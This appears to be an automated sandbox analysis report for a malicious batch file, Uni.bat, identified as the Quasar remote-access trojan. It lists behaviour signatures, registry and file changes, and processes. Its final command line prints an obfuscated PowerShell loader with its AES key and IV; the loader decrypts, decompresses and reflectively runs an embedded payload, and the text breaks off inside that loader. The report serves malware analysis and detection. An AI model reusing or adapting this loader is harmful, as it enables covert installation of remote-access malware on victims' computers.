Analysis Overview
SHA256
d34225f65c10acac82f381cf0f4281b2bc691afb2b72a1331acee94ca10e5c1c
Threat Level: Known bad
The file Uni.bat was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Sets service image path in registry
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Checks BIOS information in registry
Enumerates connected drives
Looks up external IP address via web service
Writes to the Master Boot Record (MBR)
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of UnmapMainImage
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Modifies registry class
Modifies data under HKEY_USERS
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-11 17:41
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-11 17:41
Reported
2024-06-11 17:46
Platform
win10v2004-20240508-en
Max time kernel
300s
Max time network
270s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3188 created 612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\G: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\svchost.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\svchost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PHYSICALDRIVE0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3188 set thread context of 4924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SoftwareDistribution\ReportingEvents.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\EventCache.v2\{4E3A2C56-F6CF-44DC-94A9-BA869AC1A54A}.bin | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\Logs\CBS\CBS.log | C:\Windows\servicing\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Windows\Logs\CBS\CBS.log | C:\Windows\servicing\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-97-fe-bc-2c-3d\WpadDecisionTime = d9f2f21427bcda01 | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f2-97-fe-bc-2c-3d\WpadDecisionReason = "1" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WaaSMedicAgent.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 